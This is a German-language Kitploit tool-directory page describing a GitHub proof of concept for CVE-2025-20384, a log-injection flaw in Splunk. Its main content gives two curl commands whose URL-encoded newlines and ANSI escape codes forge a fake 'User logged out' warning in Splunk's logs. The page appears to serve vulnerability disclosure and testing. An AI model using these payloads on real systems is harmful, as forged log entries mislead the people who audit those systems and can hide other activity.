Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-20384 — Proof-of-Concept, das Log-Injection und -Poisoning in Splunk über manipulierte URL-Parameter demonstriert und die OWASP-Risiken der Log-Injection hervorhebt. | Kitploit
Tools/GitHubGitHub/axselll/cve-2025-20384
SchwachstellenanalyseExploitationWebsicherheitPenetrationstestsLernen & BildungLog-Analyse
GitHubaxselll/cve-2025-20384

CVE-2025-20384

Proof-of-Concept, das Log-Injection und -Poisoning in Splunk über manipulierte URL-Parameter demonstriert und die OWASP-Risiken der Log-Injection hervorhebt.

Repository anzeigen
3vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SPLUNK CVE-2025-20384

Ich weiß nicht, ich lese einfach das Zeug, das mein Kumpel mir geschickt hat, und tippe einen zufälligen, armseligen Javascript-Code runter.

Log Injection/Forgery/Poisoning/Obfuscate Typ POC

Bitte lesen Sie diesen Artikel: OWASP Log Injection

TL;DR

  • Suche nach einer statischen Datei, übergebe sie und hänge einen zufälligen Parameter an.
  • Also übergebe ich curl -k "https://localhost:8000/en-US/static/app/search/application.css%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----" ODER curl -k "https://localhost:8000/en-US/static/app/search/application.css%1B[31mANSI_TEST_RED%1B[0m%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----"
  • Wenn Sie sehen, dass eine zufällige neue Zeile erscheint, ist das Poisoning. Es mag harmlos erscheinen, weil es nur ein "normales" Poisoning ist, aber es kann lästig sein, wenn es gezielt eingesetzt wird.

Referenzen

Link zum CVE-Datensatz

Tool herunterladen